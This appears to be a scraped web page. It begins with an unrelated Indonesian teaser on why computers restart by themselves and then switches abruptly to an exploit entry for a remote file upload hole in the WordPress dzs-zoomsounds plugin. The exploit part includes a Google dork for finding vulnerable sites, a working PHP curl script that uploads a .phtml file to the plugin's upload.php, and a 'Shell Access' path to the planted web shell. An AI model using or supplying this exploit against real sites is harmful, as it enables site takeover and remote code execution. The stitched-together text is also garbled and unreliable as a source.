Penyebab komputer restart sendiri dan cara mengatasi - Belajar komputer kali ini akan membahas tentang penyebab komputer restart sendiri dan cara mengatasinya. Komputer restart sendiri itu sangat menjengkelkan, apalagi ketika kita sedang mengerjakan tugas dengan Microsoft word. Saya dulu pernah mengalami hal demikian, sehingga saya mencari-cari sendiri apa penyebab komputer sering restart
################################################################################################### # Exploit Title: WordPress dzs-zoomsounds Plugins Remote File Upload Vulnerability # Vendor : http: //digitalzoomstudio.net/docs/wpzoomsounds/ # Author: bl4ck-dz # Date : 28/05/2015 # Infected File: upload.php # Category: webapps # Google dork:inurl:/wp-content/plugins/dzs-zoomsounds/ # Tested on : Linux | Windows ################################################################################################### <?php $evil = "dz.phtml" ; $ch = curl_init( "http://127.0.0.1/wp-content/plugins/dzs-zoomsounds/admin/upload.php" ); curl_setopt( $ch , CURLOPT_POST, true); curl_setopt( $ch , CURLOPT_POSTFIELDS, array ( 'file_field' => "@$evil" )); curl_setopt( $ch , CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec( $ch ); curl_close( $ch ); echo "$postResult" ; ?> Shell Access : http: //127.0.0.1/wp-content/plugins/dzs-zoo...
Comments
Post a Comment